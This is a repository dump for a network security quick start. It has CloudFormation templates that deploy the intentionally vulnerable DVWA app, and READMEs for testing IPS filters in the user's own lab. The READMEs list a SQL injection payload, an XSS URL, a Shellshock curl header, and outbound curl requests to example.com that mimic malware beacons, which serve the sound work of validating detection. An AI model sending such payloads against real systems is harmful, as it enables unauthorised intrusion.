"cache.m5.xlarge", 42 | "cache.m5.2xlarge", 43 | "cache.m5.4xlarge", 44 | "cache.m5.12xlarge", 45 | "cache.m5.24xlarge", 46 | "cache.r3.large", 47 | "cache.r3.xlarge", 48 | "cache.r3.2xlarge", 49 | "cache.r3.4xlarge", 50 | "cache.r3.8xlarge", 51 | "cache.r4.large", 52 | "cache.r4.xlarge", 53 | "cache.r4.2xlarge", 54 | "cache.r4.4xlarge", 55 | "cache.r4.8xlarge", 56 | "cache.r4.16xlarge", 57 | "cache.r5.large", 58 | "cache.r5.xlarge", 59 | "cache.r5.2xlarge", 60 | "cache.r5.4xlarge", 61 | "cache.r5.12xlarge", 62 | "cache.r5.24xlarge" 63 | ], 64 | "ConstraintDescription": "Must select a valid ElastiCache node type.", 65 | "Default": "cache.t3.medium", 66 | "Description": "The compute and memory capacity of nodes in a cache cluster. 
Please check that the selected instance type is available in your region.", 67 | "Type": "String" 68 | }, 69 | "NumberOfNode": { 70 | "Default": "2", 71 | "MinValue": "1", 72 | "MaxValue": "20", 73 | "Description": "The number of cache nodes that the cache cluster should have.", 74 | "Type": "Number" 75 | } 76 | }, 77 | "Resources":{ 78 | "ElastiCacheSubnetGroup":{ 79 | "Type" : "AWS::ElastiCache::SubnetGroup", 80 | "Properties" : { 81 | "Description": "Subnets available for the ElastiCache Memcached Instance", 82 | "SubnetIds":{ 83 | "Ref": "Subnets" 84 | } 85 | } 86 | }, 87 | "ElastiCacheCluster":{ 88 | "Type": "AWS::ElastiCache::CacheCluster", 89 | "Properties":{ 90 | "Engine": "memcached", 91 | "EngineVersion": "1.6.6", 92 | "CacheNodeType":{ 93 | "Ref": "NodeType" 94 | }, 95 | "NumCacheNodes": { 96 | "Ref": "NumberOfNode" 97 | }, 98 | "CacheSubnetGroupName":{ 99 | "Ref": "ElastiCacheSubnetGroup" 100 | }, 101 | "VpcSecurityGroupIds": { 102 | "Ref": "ElastiCacheSecurityGroup" 103 | }, 104 | "Tags":[ 105 | { 106 | "Key": "Name", 107 | "Value": "WordPress-ElastiCache-Cluster" 108 | } 109 | ] 110 | } 111 | } 112 | 113 | }, 114 | "Outputs":{ 115 | "ElastiCacheClusterId":{ 116 | "Description": "ElastiCache Cluster ID", 117 | "Value":{ 118 | "Ref": "ElastiCacheCluster" 119 | } 120 | }, 121 | "ElastiCacheClusterEndPoint":{ 122 | "Description": "ElastiCache Cluster Endpoint to connect", 123 | "Value": { 124 | "Fn::Join": [ 125 | "", 126 | [ 127 | { 128 | "Fn::GetAtt": ["ElastiCacheCluster", "ConfigurationEndpoint.Address"] 129 | }, 130 | ":", 131 | { 132 | "Fn::GetAtt": ["ElastiCacheCluster", "ConfigurationEndpoint.Port"] 133 | } 134 | ] 135 | ] 136 | } 137 | } 138 | } 139 | } 140 | -------------------------------------------------------------------------------- /edge-deployment/docs/edge_deployment.drawio: -------------------------------------------------------------------------------- 1 | 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 
-------------------------------------------------------------------------------- /edge-deployment/templates/dvwa.template: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. 
If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 
103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 
129 | Mappings: 130 | RegionMap: 131 | us-east-1: #North Virginia 132 | DvwaAMI: ami-091ed521de20a50c2 133 | us-east-2: #Ohio 134 | DvwaAMI: ami-03d0d38f817e95c6f 135 | us-west-1: #North California 136 | DvwaAMI: ami-0b9e4c39f148b835c 137 | us-west-2: #Oregon 138 | DvwaAMI: ami-0adb84ff1c722394f 139 | Conditions: 140 | UsingDefaultBucket: !Equals 141 | - !Ref QSS3BucketName 142 | - 'quickstart-network-security' 143 | Resources: 144 | DVWASecurityGroup: 145 | Type: AWS::EC2::SecurityGroup 146 | Properties: 147 | GroupName: "DVWA-SG1" 148 | GroupDescription: "Security group to access DVWA instance" 149 | VpcId: !Ref VPCID 150 | SecurityGroupIngress: 151 | - IpProtocol: tcp 152 | FromPort: 80 153 | ToPort: 80 154 | CidrIp: 0.0.0.0/0 155 | - IpProtocol: tcp 156 | FromPort: 22 157 | ToPort: 22 158 | CidrIp: !Ref DVWARemoteAccessCIDR 159 | SecurityGroupEgress: 160 | - IpProtocol: tcp 161 | FromPort: 0 162 | ToPort: 65535 163 | CidrIp: 0.0.0.0/0 164 | DVWA: 165 | Type: AWS::EC2::Instance 166 | Properties: 167 | ImageId: 168 | Fn::FindInMap: 169 | - RegionMap 170 | - Ref: AWS::Region 171 | - DvwaAMI 172 | InstanceType: !Ref DVWAInstanceType 173 | KeyName: !Ref KeyPairName 174 | Tags: 175 | - Key: Name 176 | Value: DVWA 177 | SubnetId: !Ref PublicSubnet1ID 178 | SecurityGroupIds: 179 | - Ref: DVWASecurityGroup 180 | BlockDeviceMappings: 181 | - DeviceName: /dev/sdm 182 | Ebs: 183 | DeleteOnTermination: true 184 | VolumeSize: !Ref RootVolumeSize 185 | Outputs: 186 | DVWASecurityGroup: 187 | Description: DVWA security group ID. 188 | Value: !Ref DVWASecurityGroup 189 | Export: 190 | Name: !Sub '${AWS::StackName}-DVWASecurityGroupID' 191 | DVWAPublicIP: 192 | Description: DVWA instance Public IP 193 | Value: !GetAtt DVWA.PublicIp 194 | Export: 195 | Name: !Sub '${AWS::StackName}-DVWAInstancePublicIP' 196 | Postdeployment: 197 | Description: See the deployment guide for post-deployment steps. 
198 | Value: https://aws.amazon.com/quickstart/?quickstart-all.sort-by=item.additionalFields.sortDate&quickstart-all.sort-order=desc&awsm.page-quickstart-all=5 -------------------------------------------------------------------------------- /centralized-with-gwlb/README.md: -------------------------------------------------------------------------------- 1 | # centralized-deployment-with-gwlb 2 | 3 | ## Purpose and Objectives 4 | 5 | This Quick Start deploys a security VPC with an Apache web server for inbound traffic inspection. It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets. The purpose of this Quick Start is to provide users with a sample environment where they can deploy the Network Security Virtual Appliance to protect their resources from inbound internet traffic. In this deployment, we use a Gateway Load Balancer to route traffic to the Network Security Appliance. 6 | 7 | After deploying this Quick Start, you will be able to: 8 | 9 | - Deploy Network Security Virtual Appliance (NSVA) as [Centralized Inbound Protection](https://cloudone.trendmicro.com/docs/network-security/GWLB_CFdeploy1/) 10 | - Configure your security profile in the Network Security console by distributing various Intrusion Prevention (IPS) and Geo Filters to protect your resources from inbound attacks 11 | - Perform various inbound and outbound attacks to validate protection. 12 | - Access logs of the Network Security Virtual Appliance (NSVA) to verify which filters are getting triggered. 13 | ## Network Architecture 14 | 15 | 16 | 17 | ## Deployment Steps 18 | 19 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to make changes to this code and deploy with your own customized changes:* 20 | 21 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/centralized-with-gwlb/templates/Master.yaml` 22 | ### 1. 
Deploy Network Security with Centralized Security VPC 23 | The Quick Start offers two deployment options: 24 | 25 | - Deploying Network Security with centralized security VPC without High Availability 26 | - Deploying Network Security with centralized security VPC with High Availability 27 | 28 | The following prerequisites must be fulfilled before you can deploy the Quick Start: 29 | - Create a new SSH key pair in the AWS region you will be deploying the Quick Start to 30 | - [Generate a CloudOne API Key](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/#generate-an-api-key) 31 | 32 | Below are the parameters for the Quick Start: 33 | #### Quick Start Parameters 34 | 35 | ##### Required parameters 36 | | Parameter label (name) | Default | Description | 37 | | :----------------------| :------------- | :------------------------------------------------------------- | 38 | | AllowIP | 127.0.0.1/32 | Only the IP entered here will be able to access the web server | 39 | | BucketName | quickstart-network-security | Name of the bucket where the template is placed | 40 | | BucketPrefix | centralized-with-gwlb/ | Bucket prefix | 41 | | BucketRegion | us-west-1| Bucket region | 42 | | DVWAInstanceType | t3.micro | Amazon EC2 instance type for the DVWA instances | 43 | | sshKeyPairName | None| [Required: 'DeployC1NS' must be set to true] SSH key of the EC2 instance you are using | 44 | | SSMAccess | true | If enabled, SSM access to the instance will be available | 45 | | DeployHTTPS | false | If enabled, the HTTPS site will be deployed | 46 | | DeployC1NS | true | If enabled, C1NS will be deployed in the centralized Security VPC | 47 | | DeployC1NSHA | false | [KEEP IT to 'false', DOESN'T WORK CURRENTLY] If enabled, C1NS will be deployed in the centralized Security VPC | 48 | | DeploySplunk | false | [Required: 'DeployC1NS' must be set to true] If enabled, a Splunk Server will be deployed | 49 | 50 | ##### If you set the DeployHTTPS parameter to true, the 
following parameters are required 51 | | Parameter label (name) | Default | Description | 52 | | :----------------------| :------------- | :------------------------------------------------------------- | 53 | | DomainName | None | Domain name to be used for the website | 54 | | SubDomain | None | Subdomain to be used for the ALB. | 55 | | HostZoneID | None | ID of the HostZone where the domain you want to use is registered. The domain name to be used must be registered in Route53's HostZone. If you have not already done so, please create a new HostZone and register your domain. The HostZone must be public | 56 | 57 | ##### If you set the DeployC1NS parameter to true, the following parameters are required 58 | | Parameter label (name) | Default | Description | 59 | | :----------------------| :------------- | :------------------------------------------------------------- | 60 | | CloudOneAPIKEY | None | CloudOne API key you want to use | 61 | | InstanceType | c5n.2xlarge | Instance type of NSVA | 62 | | SecurityVPCCIDR | 10.10.10.0/16 | CIDR of the VPC where you want to deploy the NSVA | 63 | | NsvaCountPerAz | 1 | Number of NSVA instances to be deployed in the AZ | 64 | | EnableInspectionLogs | false | If enabled, NSVA Inspection Logs will be published to CloudWatch log group "network_security_logs" | 65 | 66 | ##### If you set the DeploySplunk parameter to true, the following parameters are required 67 | | Parameter label (name) | Default | Description | 68 | | :----------------------| :------------- | :------------------------------------------------------------- | 69 | | SyslogPort | 5140 | Port number used by Splunk Server | 70 | | SplunkPassword | None | Password used by Splunk Server | 71 | | SplunkVersion | 8.2 | Splunk Version | 72 | 73 | ## Performing IPS and SQL Attacks 74 | 75 | Before performing each attack, please perform the following steps: 76 | 1. Configure respective filter to Block and Log mode in Trend Micro Cloud One console. 
For detailed steps please check [Customize filter settings using the GUI](https://cloudone.trendmicro.com/docs/network-security/Customize_filter_settings_GUI/) 77 | 2. Distribute the profile with filter overrides. For detailed steps please check [Distribute filter overrides to your network](https://cloudone.trendmicro.com/docs/network-security/Filter_overrides_GUI/) 78 | 79 | ### SQL Attacks 80 | 81 | SQL attacks can be performed on the DVWA server that is spun up as part of the Quick Start. In order to perform SQL attacks, you will need to first configure the application security level to "Low" in order for the attacks to work properly. This can be done as follows: 82 | 83 | 1. Log in to the DVWA application from your browser. You can retrieve the DVWAPublicIP from the "Output" tab of your DVWA CloudFormation stack. The URL would be `http://<DVWAPublicIP>` 84 | 2. Log in to the web application using the following default credentials 85 | Username: `admin` 86 | Password: `password` 87 | 3. Go to the DVWA Security menu on the side navigation panel 88 | 4. Set Security Level to "Low" and hit the Submit button 89 | 90 | Below are some SQL attacks you can perform on your DVWA server 91 | 92 | | Filter ID | Attack | 93 | | :--------- | :------------------------------------------------------------ | 94 | | 3593 | 1. Go to the SQL Injection menu on the side navigation panel
2. Enter `?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit` in "User ID" text box and hit submit | 95 | | 12365 | On your browser, enter `http:///vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E` | 96 | 97 | ### Inbound Attacks 98 | 99 | Inbound attacks could be performed on any publicly accessible webserver. In this case, we can perform a simple Shell Shock attack on our DVWA or Web Server created 100 | 101 | | Filter ID | Attack | 102 | | :--------- | :----------------------------------------------------------------- | 103 | | 16798 | `curl -H "User-Agent: () { :; }; /bin/eject" http://` | 104 | -------------------------------------------------------------------------------- /edge-deployment/README.md: -------------------------------------------------------------------------------- 1 | # quickstart-network-security-edge-deployment 2 | 3 | *Note: This Quick Start is an adaptation of original [Wordpress High Availability By Bitnami](https://github.com/aws-quickstart/quickstart-bitnami-wordpress). The original quickstart has been modified to include DVWA instance in the deployment* 4 | 5 | ## Purpose and Objectives 6 | 7 | This Quick Start deploys WordPress High Availability by Bitnami, which includes WordPress and Amazon Aurora, in a highly available environment on AWS in about 40 minutes. It also deploys Damn Vulnerable Web Application (DVWA) in one of the public subnets. The purpose of this quickstart is to provide users a sample environment where they can deploy Network Security Virtual Appliance to protect their resources including web servers and databases etc. 
8 | 9 | After deploying this Quick Start, you will be able to: 10 | 11 | - Deploy Network Security Virtual Appliance (NSVA) as an [Edge Protection](https://cloudone.trendmicro.com/docs/network-security/option1/) 12 | - Configure your security profile in the Network Security console by distributing various Intrusion Prevention (IPS) and Geo Filters to protect your resources from inbound and outbound attacks. 13 | - Perform various inbound and outbound attacks to validate protection. 14 | - Access logs of the Network Security Virtual Appliance (NSVA) to verify which filters are getting triggered. 15 | 16 | ## Quick Start architecture for WordPress High Availability by Bitnami and DVWA on AWS 17 | 18 | 19 | 20 | ## Deployment Steps 21 | 22 | *Note: You can deploy this Quick Start using the default S3 template link below if you don't wish to make changes to this code and deploy with your own customized changes:* 23 | 24 | `https://quickstart-network-security.s3.us-west-1.amazonaws.com/edge-deployment/templates/edge-deployment.template` 25 | ### 1. Deploy sample WordPress environment with DVWA 26 | The Quick Start offers two deployment options: 27 | 28 | - Deploying WordPress High Availability by Bitnami and DVWA into a new virtual private cloud (VPC) on AWS 29 | - Deploying WordPress High Availability by Bitnami and DVWA into an existing VPC on AWS 30 | 31 | For architectural details, best practices, step-by-step instructions, and customization options, see the 32 | [Bitnami quickstart deployment guide](https://fwd.aws/arqWN). 33 | 34 | Before proceeding to deploy the Quick Start, please create a new SSH key pair for the DVWA instance in the AWS region you will be deploying the Quick Start to. You may use the same key pair as the one you created for the Bastion hosts if you don't want to create an additional key pair. 
35 | 36 | Below are the additional parameters for DVWA Configuration that the Quick Start uses: 37 | 38 | #### DVWA Configuration 39 | 40 | | Parameter label (name) | Default | Description | 41 | | :--------------------------------------------------------| :------------- | :----------------- | 42 | | DVWA Instance Type (DVWAInstanceType) | t2.micro | Amazon EC2 instance type for the DVWA instance | 43 | | Allowed DVWA External Access CIDR (DVWARemoteAccessCIDR) | 127.0.0.1/32 | The CIDR IP range that is permitted external SSH access to the DVWA instance. We recommend that you set this value to a trusted IP range | 44 | | SSH KeyPair Name (DVWAKeyPairName) | Requires input | A public/private key pair, which allows you to connect securely to your instance after it launches. When you created an AWS account, this is the key pair you created in your preferred region | 45 | ### 2. Deploying Network Security to your environment 46 | 47 | After the CloudFormation stack is successfully deployed, please use the deployment wizard in your Network Security console to deploy the Network Security Appliance in your environment. For detailed step-by-step instructions on deploying Network Security please check the [Deploy Protection](https://cloudone.trendmicro.com/docs/network-security/add_cloud_accounts_appliances/) section 48 | 49 | Once the Network Security Virtual Appliances have been successfully deployed, make sure they are visible in the Trend Micro Cloud One console and are reporting 'Active' status. 50 | 51 | Your environment is now ready to inspect inbound and outbound traffic! 52 | 53 | ### 3. Enable CloudWatch logs for your Network Security Appliances 54 | 55 | In order to see the block logs after performing the various attacks, you will need to configure logs for each of your Network Security Appliances. 
For detailed step-by-step instructions on enabling CloudWatch logs please check [Enable CloudWatch logs](https://cloudone.trendmicro.com/docs/network-security/Manage_Network_Security_instances/#cloudwatch) 56 | 57 | You will need to enable at least `ipsBlock` and `reputationBlock` to see logs from the attacks listed below. 58 | 59 | ## Performing IPS, Geo and SQL Attacks 60 | 61 | Before performing each attack, please perform the following steps: 62 | 1. Configure the respective filter to Block and Log mode in the Trend Micro Cloud One console. For detailed steps please check [Customize filter settings using the GUI](https://cloudone.trendmicro.com/docs/network-security/Customize_filter_settings_GUI/) 63 | 2. Distribute the profile with filter overrides. For detailed steps please check [Distribute filter overrides to your network](https://cloudone.trendmicro.com/docs/network-security/Filter_overrides_GUI/) 64 | 65 | ### Outbound Attacks 66 | 67 | Below is the list of outbound attacks you can perform from your WordPress web server. You will need to SSH into the web server instance via the Bastion Host that is created as part of the Quick Start setup. 
68 | 69 | | Filter ID | Attack | 70 | | :--------- | :-------------------------------------------------------------- | 71 | | 25492 | `curl -H 'User-Agent: sdvntyer' http://www.example.com/api/v88` | 72 | | 34738 | `curl 'http://www.example.com/includes/main.php?t=7d4580a3910c54d62b46f24c397c8d59&f=g2&type=cmd&id=D7CB4B6E5A21CA596DE0A7E10059C85E'`| 73 | | 38451 | `curl -H 'User-Agent: ArcherGhost' -d 'post=eyJkYXRhIjogeyJkb21haW4iOiAiaHR0cDovL3RhcmdldDEyMy5jb20vYXNzZXRzL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQL3Nzc3AucGhwIiwgInNlcnZlciI6ICIxOTIuMTY4LjEwNy4xOSIsICJ0aXRsZSI6ICJqcSJ9LCAidHlwZSI6ICJzY2FubmVyIn0%3D' http://www.example.com/adeliap/404.php` | 74 | 75 | ### Geo Filter Attacks 76 | 77 | In order to perform Geo Filter attacks, you need to first configure Geo Filters in Trend Micro Cloud One console by selecting a geographic region to block traffic. For detailed steps on how to configure Geo Filters, please check [Geolocation Filter](https://cloudone.trendmicro.com/docs/network-security/Geo_Location_filtering/). 78 | 79 | Below is the list of geofilter attacks you can perform from your Wordpress WebServer. You will need to SSH into the webserver instance via Bastion Host that is created as part of the Quick Start setup. 80 | 81 | | Region | Attack | 82 | | :----- | :----------------------- | 83 | | China | `curl https://baidu.com` | 84 | | Russia | `curl https://mail.ru ` | 85 | 86 | ### SQL Attacks 87 | 88 | SQL Attacks can be performed on DVWA server that is spun up as part of the Quick Start. In order to perform SQL Attacks, you wil need to first configure the application security level to "Low" in order for attacks to work properly. This can be done as follows: 89 | 90 | 1. Login to DVWA application from your browser. You can retrieve the DVWAPublicIP from the "Output" tab of your DVWA CloudFormation stack. The URL would be `http://` 91 | 2. 
Log in to the web application using the following default credentials 92 | Username: `admin` 93 | Password: `password` 94 | 3. Go to the DVWA Security menu on the side navigation panel 95 | 4. Set Security Level to "Low" and hit the Submit button 96 | 97 | Below are some SQL attacks you can perform on your DVWA server 98 | 99 | | Filter ID | Attack | 100 | | :--------- | :------------------------------------------------------------ | 101 | | 3593 | 1. Go to the SQL Injection menu on the side navigation panel
2. Enter `?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit` in "User ID" text box and hit submit | 102 | | 12365 | On your browser, enter `http:///vulnerabilities/xss_d/?default=English%3Cscript%3Ealert(1)%3C/script%3E` | 103 | 104 | ### Inbound Attacks 105 | 106 | Inbound attacks could be performed on any publicly accessible webserver. In this case, we can perform a simple Shell Shock attack on our DVWA server 107 | 108 | | Filter ID | Attack | 109 | | :--------- | :----------------------------------------------------------------- | 110 | | 16798 | `curl -H "User-Agent: () { :; }; /bin/eject" http://` | 111 | -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/dvwa.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | Description: DVWA Server with MySql DB 3 | Metadata: 4 | QuickStartDocumentation: 5 | EntrypointName: Launch into an existing VPC 6 | Order: 2 7 | LICENSE: Apache License, Version 2.0 8 | 'AWS::CloudFormation::Interface': 9 | ParameterGroups: 10 | - Label: 11 | default: Network configuration 12 | Parameters: 13 | - VPCID 14 | - PublicSubnet1ID 15 | - DVWARemoteAccessCIDR 16 | - Label: 17 | default: Amazon EC2 configuration 18 | Parameters: 19 | - KeyPairName 20 | - DVWAInstanceType 21 | - RootVolumeSize 22 | - Label: 23 | default: AWS Quick Start configuration 24 | Parameters: 25 | - QSS3BucketName 26 | - QSS3KeyPrefix 27 | - QSS3BucketRegion 28 | ParameterLabels: 29 | QSS3BucketRegion: 30 | default: Quick Start S3 bucket region 31 | DVWAInstanceType: 32 | default: DVWA instance type 33 | KeyPairName: 34 | default: Key pair name 35 | PublicSubnet1ID: 36 | default: Public subnet 1 ID 37 | QSS3BucketName: 38 | default: Quick Start S3 bucket name 39 | QSS3KeyPrefix: 40 | default: Quick Start S3 key prefix 41 | DVWARemoteAccessCIDR: 42 | default: Allowed DVWA external access CIDR 43 | VPCID: 44 | default: VPC 
ID 45 | RootVolumeSize: 46 | default: Root volume size 47 | cfn-lint: { config: { ignore_checks: [E9007] } } 48 | Parameters: 49 | DVWAInstanceType: 50 | AllowedValues: 51 | - t2.nano 52 | - t2.micro 53 | - t2.small 54 | - t2.medium 55 | - t2.large 56 | - t3.micro 57 | - t3.small 58 | - t3.medium 59 | - t3.large 60 | - t3.xlarge 61 | - t3.2xlarge 62 | - m4.large 63 | - m4.xlarge 64 | - m4.2xlarge 65 | - m4.4xlarge 66 | Default: t2.micro 67 | Description: Amazon EC2 instance type for the DVWA instances. 68 | Type: String 69 | KeyPairName: 70 | Description: Name of an existing public/private key pair. If you do not have one in this AWS Region, 71 | please create it before continuing. 72 | Type: 'AWS::EC2::KeyPair::KeyName' 73 | PublicSubnet1ID: 74 | Description: ID of the public subnet 1 that you want to provision the first DVWA into (e.g., subnet-a0246dcd). 75 | Type: 'AWS::EC2::Subnet::Id' 76 | QSS3BucketName: 77 | AllowedPattern: ^[0-9a-zA-Z]+([0-9a-zA-Z-]*[0-9a-zA-Z])*$ 78 | ConstraintDescription: The Quick Start bucket name can include numbers, lowercase 79 | letters, uppercase letters, and hyphens (-). It cannot start or end with a 80 | hyphen (-). 81 | Default: quickstart-network-security 82 | Description: Name of the S3 bucket for your copy of the Quick Start assets. 83 | Keep the default name unless you are customizing the template. 84 | Changing the name updates code references to point to a new Quick 85 | Start location. This name can include numbers, lowercase letters, 86 | uppercase letters, and hyphens, but do not start or end with a hyphen (-). 87 | See https://quickstart-network-security.github.io/option1.html. 88 | Type: String 89 | QSS3BucketRegion: 90 | Default: 'us-west-1' 91 | Description: The AWS Region where the Quick Start S3 bucket (QSS3BucketName) is hosted. When using your own bucket, you must specify this value. 
92 | Type: String 93 | QSS3KeyPrefix: 94 | AllowedPattern: ^([0-9a-zA-Z-.]+/)*$ 95 | ConstraintDescription: The Quick Start S3 key prefix can include numbers, lowercase letters, 96 | uppercase letters, hyphens (-), and forward slashes (/). 97 | Default: edge-deployment/ 98 | Description: S3 key prefix that is used to simulate a directory for your copy of the 99 | Quick Start assets. Keep the default prefix unless you are customizing 100 | the template. Changing this prefix updates code references to point to 101 | a new Quick Start location. This prefix can include numbers, lowercase 102 | letters, uppercase letters, hyphens (-), and forward slashes (/). End with a forward slash. 103 | See https://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html 104 | and https://quickstart-network-security.github.io/option1.html. 105 | Type: String 106 | DVWARemoteAccessCIDR: 107 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/([0-9]|[1-2][0-9]|3[0-2]))$ 108 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/x 109 | Description: Allowed CIDR block for external SSH access to the DVWAs. 110 | Type: String 111 | Default: '127.0.0.1/32' 112 | VPCID: 113 | Description: ID of the VPC (e.g., vpc-0343606e). 114 | Type: 'AWS::EC2::VPC::Id' 115 | RootVolumeSize: 116 | Description: The size in GB for the root EBS volume. 117 | Type: Number 118 | Default: '10' 119 | Rules: 120 | SubnetsInVPC: 121 | Assertions: 122 | - Assert: 123 | 'Fn::EachMemberIn': 124 | - 'Fn::ValueOfAll': 125 | - 'AWS::EC2::Subnet::Id' 126 | - VpcId 127 | - 'Fn::RefAll': 'AWS::EC2::VPC::Id' 128 | AssertDescription: All subnets must exist in the VPC. 
129 | Mappings: 130 | RegionMap: 131 | us-east-1: #North Virginia 132 | DvwaAMI: ami-091ed521de20a50c2 133 | us-east-2: #Ohio 134 | DvwaAMI: ami-03d0d38f817e95c6f 135 | us-west-1: #North California 136 | DvwaAMI: ami-0b9e4c39f148b835c 137 | us-west-2: #Oregon 138 | DvwaAMI: ami-0adb84ff1c722394f 139 | af-south-1: #Cape Town 140 | DvwaAMI: ami-0ef071ad81bde0437 141 | ap-east-1: #Hong Kong 142 | DvwaAMI: ami-00d021ed3c5b0f047 143 | ap-south-1: #Mumbai 144 | DvwaAMI: ami-0dc33407bbfb0381b 145 | ap-northeast-1: #Tokio 146 | DvwaAMI: ami-0539984a3053a7c65 147 | ap-northeast-2: #Seoul 148 | DvwaAMI: ami-0a6da91fc1b4c3050 149 | ap-northeast-3: #Osaka 150 | DvwaAMI: ami-04325f0723618d365 151 | ap-southeast-1: #Singapore 152 | DvwaAMI: ami-093e255d56ca99fe0 153 | ap-southeast-2: #Sydney 154 | DvwaAMI: ami-03877a0f8b097ea90 155 | ca-central-1: #Canada 156 | DvwaAMI: ami-0cd5aadd5da8446d7 157 | cn-north-1: # Not created yet 158 | DvwaAMI: ami-038255e61d99fa5b7 159 | cn-northwest-1: # Not created yet 160 | DvwaAMI: ami-038255e61d99fa5b7 161 | eu-central-1: #Frankfurt 162 | DvwaAMI: ami-08b5eadce176a41de 163 | eu-west-1: #Ireland 164 | DvwaAMI: ami-022b465e35144bcf0 165 | eu-west-2: #London 166 | DvwaAMI: ami-067257ddeaaec207f 167 | eu-west-3: #Paris 168 | DvwaAMI: ami-038255e61d99fa5b7 169 | eu-south-1: #Milan 170 | DvwaAMI: ami-01d5f2922f887f140 171 | eu-north-1: #Stockholm 172 | DvwaAMI: ami-0d6ee1c8580224f4e 173 | me-south-1: #Bahrein 174 | DvwaAMI: ami-0db951eb511fd6a03 175 | 